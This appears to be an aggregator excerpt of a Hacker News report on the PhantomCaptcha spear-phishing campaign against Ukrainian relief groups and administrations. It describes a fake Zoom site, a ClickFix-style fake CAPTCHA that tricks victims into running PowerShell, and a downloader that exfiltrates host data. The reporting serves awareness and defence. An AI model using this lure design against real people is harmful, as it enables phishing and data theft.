"The phishing emails have been found to impersonate the Ukrainian President's Office, carrying a booby-trapped PDF document that contains an embedded link, which, when clicked, redirects victims to a fake Zoom site ("zoomconference[.]app") and tricks them into running a malicious PowerShell command via a ClickFix- style fake Cloudflare CAPTCHA page under the guise of a browser check."
"The bogus Cloudflare page acts as an intermediary by setting up a WebSocket connection with an attacker-controlled server, and transmits a JavaScript-generated clientId, with the browser taking the victim to a legitimate, password-protected Zoom meeting if the WebSocket server responds with a matching identifier. It's suspected that this infection path is likely reserved for live social engineering calls with victims, although SentinelOne said it did not observe the threat actors activating this line of attack during its investigation."
A coordinated spear-phishing campaign named PhantomCaptcha targeted organizations associated with Ukraine war relief and multiple regional Ukrainian administrations on October 8, 2025. Phishing emails impersonated the Ukrainian President's Office and delivered a booby-trapped PDF containing an embedded link that redirected recipients to a fake Zoom site (zoomconference[.]app). The fake site presented a ClickFix-style Cloudflare CAPTCHA that coaxed victims into pasting and running a malicious PowerShell command via the Windows Run dialog. The command launched an obfuscated downloader that retrieved a second-stage payload for host reconnaissance and exfiltration to the attacker-controlled server. The infection vector appears tailored for live social engineering calls.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]